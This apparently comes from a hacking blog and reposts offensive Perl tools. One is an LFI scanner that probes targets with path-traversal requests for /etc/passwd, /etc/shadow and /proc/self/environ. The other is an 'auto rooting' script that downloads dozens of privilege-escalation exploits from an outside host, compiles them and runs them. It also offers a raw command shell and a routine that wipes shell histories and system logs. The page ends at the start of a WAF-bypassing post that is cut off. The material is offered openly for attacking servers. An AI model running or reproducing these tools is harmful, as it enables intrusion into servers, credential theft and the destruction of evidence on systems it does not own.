Inilah Cerita Kita

Viper LFI Scanner Ver. 3.0

2011-12-21T21:18:00.002+08:00

#!/usr/bin/perl
#
#    ////////////////////////////////////
#     Viper LFI Scanner Ver. 3.0
#    ////////////////////////////////////
#
# Title : Viper Lfi Scanner Ver. 3.0
# Author: Bl4ck.Viper
# From : Azarbycan
# Date : 2010/08/27
# Category : Scanner
# Home : www.Skote-vahshat.com
# Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com
# 
#
# Description :Log , Environ , Passwd File Scanner
#                
# 
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
 
    use HTTP::Request;
    use LWP::UserAgent;
system ("cls");
print "\t\t/////////////////////////////////////////////////\n";    
print "\t\t_________________________________________________\n";
print "\t\t\t Viper LFI Scanner Ver. 3.0\n";
print "\t\t\t Coded By Bl4ck.Viper\n";
print "\t\t\t Made In Azarbycan\n";
print "\t\t\t Version In English\n";
print "\t\t_________________________________________________\n";
print "\n\n";
sleep (1);
print "\t\t\t\t WELCOME\n";
print "\n\n";
menu:;
print "\tMenu:\n";
print "\t ID[1]=>Passwd,Log";
print "\t[Scan Files Of /etc/ Directory]\n";
print "\t ID[2]=>Environ";
print "\t\t[Scan Environ File For Inject Shell By U-Agent]\n";
print"\n";
print "\t\t Select ID For Start Scanner :";
$menu = <>;
if ($menu =~ /1/){
 goto lfi;
 }
 if ($menu =~ /2/){
  goto env;
 }
 else {
  print"\n\n";
  print "\t\tUnknow Command\n";
  goto menu;
 };
 
 
lfi:;
    print "\n\n";
    print "\t\t\tWelcome To /etc/ Section\n\n";
    print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
    print "\t Target :";
    $host=;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };
 
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
@lfi = ('../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user');
 
 
foreach $scan(@lfi){
 
$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
 
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan..........[$msg]\n";
}
env:;
    print "\n\n";
    print "\t\t\tWelcom To Environ Section\n\n";
    print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
    print "\t Target :";
    $host=;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };
 
print "\n\n";
print "\t\t*-*-*-*-*-* WORKING IN PROGRESS *-*-*-*-*-*\n";
print "\n\n";
 
@env = ('../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',
'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ');
 
foreach $scan_env(@env){
 
$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
 
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
else { $msg = "Not Found";}
print "$scan_env..........[$msg]\n";
}
 
 
# Bl4ck.Viper Turkish Hacker
# Copyright 2010 Black Viper

Viper Auto Rooting

2011-12-21T21:09:00.002+08:00

#!/usr/bin/perl
#
#  ==>> Viper Auto Rooting <<==
#
#
# ---------------------------------------------------------------------------------------------------------------------------
# Script : Perl
# By : Bl4ck.Viper
# From : Azarbycan (Turkish Man)(fardin Allahverdinajhand)
# Contact : Bl4ck.Viper@Gmail.Com , Bl4ck.Viper@Hotmail.Com , Bl4ck.Viper@Yahoo.Com
# Version : 2.0
# For Black Hat & Real Hackers
# --------------------------------------------------------------------------------------------------------------------------- 
# ---------------------------------------------------------------------------------------------------------------------------
# For All Version Of Linux , SunOS , MacOS X , FreeBSD
# ---------------------------------------------------------------------------------------------------------------------------
# 
 
 
print "\t\t\tViper Auto Rooting\n";
print "\t\t\tVersion : 2.0\n";
print "\n";
print "\n\n";
print "\t\t------------------------------------\n";
print "\t\t\tCoded By Bl4ck.Viper\n";
print "\t\t------------------------------------\n";
print "\t\t For See Commands type [help] :D\n";
print "\n";
command:;
print 'Viper@Localr00t#:';
$command = ;
 
if ($command =~ /help/){
goto help
}
if ($command =~ /sysline/){
goto sysline
}
if ($command =~ /varline/){
goto varline
}
if ($command =~ /gccinfo/){
goto gccinfo
}
if ($command =~ /sysinfo/){
goto sysinfo
}
if ($command =~ /logc/){
goto logc
}
if ($command =~ /config/){
goto config
}
if ($command =~ /logs/){
goto logs
}
if ($command =~ /sysproc/){
goto sysproc
}
if ($command =~ /all/){
goto all
}
if ($command =~ /2.2.x/){
goto local2
}
if ($command =~ /2.4.x/){
goto local4
}
if ($command =~ /2.6.x/){
goto local6
}
if ($command =~ /freebsd-x/){
goto freebsd
}
if ($command =~ /mac-os-x/){
goto mac
}
if ($command =~ /red-x/){
goto red
}
if ($command =~ /sunos-x/){
goto sun
}
 
else{
print "Unknow Command !\n";
goto command
};
 
 
 
help:;
print "\t--------------------------------------------------------\n";
print "\t\tsysline\t\t[Go To System Command Line]\n";
print "\t\tvarline\t\t[Go To var.pl Command Line]\n";
print "\t\tsysinfo\t\t[Show System Information]\n";
print "\t\tsysproc\t\t[Show Running Proccess's]\n";
print "\t\tconfig\t\t[Show Config File]\n";
print "\t\tlogs\t\t[Show System Log File]\n";
print "\t\tall\t\t[Show All Localroots In Database]\n";
print "\t\tgccinfo\t\t[Check For gcc Installed Or Not Installed]\n";
print "\t\tlogc\t\t[Clear Server Log]\n";
print "\t\t2.2.x\t\t[Localroots of 2.2.x]\n";
print "\t\t2.4.x\t\t[Localroots of 2.4.x]\n";
print "\t\t2.6.x\t\t[Localroots of 2.6.x]\n";
print "\t\tfreebsd-x\t[Localroots of FreeBSD]\n";
print "\t\tmac-os-x\t[Localroots of MacOS X]\n";
print "\t\tred-x\t\t[Localroots of RedHat]\n";
print "\t\tsunos-x\t\t[Localroots of Sun Solaris OS]\n";
print "\t--------------------------------------------------------\n";
print "\n";
goto command;
sysline:;
print "system:";
$systemm = <>;
 
if ($systemm =~ /varline/){
goto varline
}
system("$systemm");
goto sysline;
varline:;
goto command;
all:;
print q{
2.2.27
2.2.x
2.4 2.6
2.4.17
2.4.18
2.4.19
2.4.20
2.4.21
2.4.22
2.4.22-10
2.4.23
2.4.24
2.4.25
2.4.26
2.4.29
2.4.x
2.6.2
2.6.4
2.6.5
2.6.7
2.6.8
2.6.9
2.6.9-22.sh
2.6.9-34
2.6.9-55
2.6.10
2.6.11
2.6.12
2.6.13
2.6.13-17-2
2.6.13-17-3
2.6.14
2.6.15
2.6.16
2.6.17
2.6.x
FreeBSD 4.4 - 4.6
FreeBSD 4.8
FreeBSD 5.3
Mac OS X
red-7.3
red-8.0
red-hat8.0-2
redhat 7.0
redhat 7.1
SunOS 5.7
SunOS 5.8
SunOS 5.9
SunOS 5.10
};
print "\n";
goto command;
local2:;
print "\t\tWelcome To 2.2.x Section\n";
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/elfcd1.c;gcc elfcd1.c -o elfcd1;chmod 777 elfcd1;./elfcd1");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.2.x;chmod 777 2.2.x;cd 2.2.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.2.x/ptrace24;chmod 777 ptrace24;./ptrace24");
system ("id");
local4:;
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/pwned.c;gcc pwned.c -o pwned;chmod 777 pwned;./pwned");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/kmod;chmod 777 kmod;./kmod");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/newlocal;chmod 777 newlocal;./newlocal");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk;chmod 777 brk;./brk");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/brk2;chmod 777 brk2;./brk2");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace;chmod 777 ptrace;./ptrace");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/ptrace-kmod;chmod 777 ptrace-kmod;./ptrace-kmod");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/2.4.22.c;gcc 2.4.22.c -o 2.4.22;chmod 777 2.4.22;./2.4.22");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/loginx;chmod 777 loginx;./loginx");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/hatorihanzo.c;gcc hatorihanzo.c -o hatorihanzo;chmod 777 hatorihanzo;./hatorihanzo");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/mremap_pte;chmod 777 mremap_pte;./mremap_pte");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/Linux-kernel-mremap.c;gcc Linux-kernel-mremap.c -o Linux-kernel-mremap;chmod 777 Linux-kernel-mremap;./Linux-kernel-mremap");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/expand_stack.c;gcc expand_stack.c -o expand_stack;chmod 777 expand_stack;./expand_stack");
system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/elflbl;chmod 777 elflbl;./elflbl");
system ("id");
local6:;
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/h00lyshit;chmod 777 h00lyshit;./h00lyshit");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad;chmod 777 krad;./krad");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/myptrace;chmod 777 myptrace;./myptrace");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/hudo.c;gcc hudo.c -o hudo;chmod 777 hudo;./hudo");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/05;chmod 777 05;./05");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad2;chmod 777 krad2;./krad2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/ong_bak.c;gcc ong_bak.c -o ong_bak;chmod 777 ong_bak;./ong_bak");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.9-55-2007-prv8;chmod 777 2.6.9-55-2007-prv8;./2.6.9-55-2007-prv8");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/04;chmod 777 04;./04");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/06;chmod 777 06;./06");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/r00t;chmod 777 r00t;./r00t");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/uselib24.c;gcc uselib24.c -o uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.11.c;gcc 2.6.11.c -o 2.6.11;chmod 777 2.6.11;./2.6.11");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad.c;gcc k-rad.c -o k-rad;chmod 777 k-rad;./k-rad");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad3;chmod 777 k-rad3;./k-rad3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/pwned;chmod 777 pwned;./pwned");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/binfmt_elf.c;gcc binfmt_elf.c -o binfmt_elf;chmod 777 binfmt_elf;./binfmt_elf");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/elfcd2.c;gcc elfcd2.c -o elfcd2;chmod 777 elfcd2;./elfcd2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct1;chmod 777 prct1;./prct1");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct2;chmod 777 prct2;./prct2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct3;chmod 777 prct3;./prct3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct4;chmod 777 prct4;./prct4");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct6;chmod 777 prct6;./prct6");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/raptor;chmod 777 raptor;./raptor");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.17;chmod 777 2.6.17;./2.6.17");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct5.sh;chmod 777 prct5.sh;./prct5.sh");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root;chmod 777 root;./root");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/cw7.3;chmod 777 cw7.3;./cw7.3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x;chmod 777 x;./x");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x2;chmod 777 x2;./x2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/exp.sh;chmod 777 exp.sh;./exp.sh");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root2;chmod 777 root2;./root2");
system ("id");
freebsd:;
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/bsd;chmod 777 bsd;./bsd");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/48local;chmod 777 48local;./48local");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/exploit;chmod 777 exploit;./exploit");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/freedbs5.3;chmod 777 freedbs5.3;./freedbs5.3");
system ("id");
mac:;
system ("cd /tmp;mkdir mac;chmod 777 mac;cd mac;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/mac/macosX;chmod 777 macosX;./macosX");
system ("id");
red:;
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/afd-expl.c;gcc afd-expl.c -o afd-expl;chmod 777 afd-expl;./afd-expl");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/alsaplayer-suid.c;gcc alsaplayer-suid.c -o alsaplayer-suid;chmod 777 alsaplayer-suid;./alsaplayer-suid");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/nslconf.c;gcc nslconf.c -o nslconf;chmod 777 nslconf;./nslconf");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ohMy-another-efs;chmod 777 ohMy-another-efs;./ohMy-another-efs");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/0x82-Remote.tannehehe.xpl.c;gcc 0x82-Remote.tannehehe.xpl.c -o 0x82-Remote.tannehehe.xpl;chmod 777 0x82-Remote.tannehehe.xpl;./0x82-Remote.tannehehe.xpl");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/efs_local;chmod 777 efs_local;./efs_local");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ifenslave;chmod 777 ifenslave;./ifenslave");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/crontab.c;gcc crontab.c -o crontab;chmod 777 crontab;./crontab");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/epcs2.c;gcc epcs2.c -o epcs2;chmod 777 epcs2;./epcs2");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/rh71sm8.c;gcc rh71sm8.c -o rh71sm8;chmod 777 rh71sm8;./rh71sm8");
system ("id");
sun:;
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/solaris27;chmod 777 solaris27;./solaris27");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/final;chmod 777 final;./final");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos59;chmod 777 sunos59;./sunos59");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos510.c;gcc sunos510.c -o sunos510;chmod 777 sunos510;./sunos510");
system ("id");
sysinfo:;
 system ("dmesg");
  print "\n\n";
   system ("set");
    print "\n\n";
     system ("uname -a");
      print "\n\n";
       system ("uname -r");
      print "\n\n";
     system ("ifconfig");
    print "\n\n";
   goto command;
gccinfo:;
 system ("locate gcc");
  print "\n\n";
   goto command;
sysproc:;
 system ("ps aux");
  print "\n\n";
   goto command;
logc:;
system ("rm -rf /tmp/logs");
system ("rm -rf $HISTFILE");
system ("rm -rf /root/.ksh_history");
system ("rm -rf /root/.bash_history");
system ("rm -rf /root/.bash_logout");
system ("rm -rf /usr/local/apache/logs");
sleep(2);
system ("rm -rf /usr/local/apache/log");
system ("rm -rf /var/apache/logs");
system ("rm -rf /var/apache/log");
system ("rm -rf /var/run/utmp");
system ("rm -rf /var/logs");
system ("rm -rf /var/log");
sleep(2);
system ("rm -rf /var/adm");
system ("rm -rf /etc/wtmp");
system ("rm -rf /etc/utmp");
print "\n";
print "Done!";
goto command;
logs:;
print "\n";
 system ("cat /etc/syslog.conf");
  print "\n\n";
 goto command;
config:;
print "\n";
 system ("cat ./../mainfile.php");
  print "\n\n";
 goto command;

Basic WAF bypassing and intrusion detection

2011-12-16T22:50:00.002+08:00

WAF Bypassing.

WAF Bypassing - short explenation.

WAF, Web application firewall. Is an attempt from administratord to secure the network.
but whit only a filter we all know you can't do that 100%

WAF bypassing is not that easy remember this.
WAF Bypassing is gambling.
if the one word is filtered try another.
stay trying and combining until you get a hit!

its like simon sais only this is harder.

how does a WAF file look like?

Code:
/*
$_GET = array_map('trim', $_GET);
//$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
    $_GET = array_map('stripslashes', $_GET);
   //$_POST = array_map('stripslashes', $_POST);
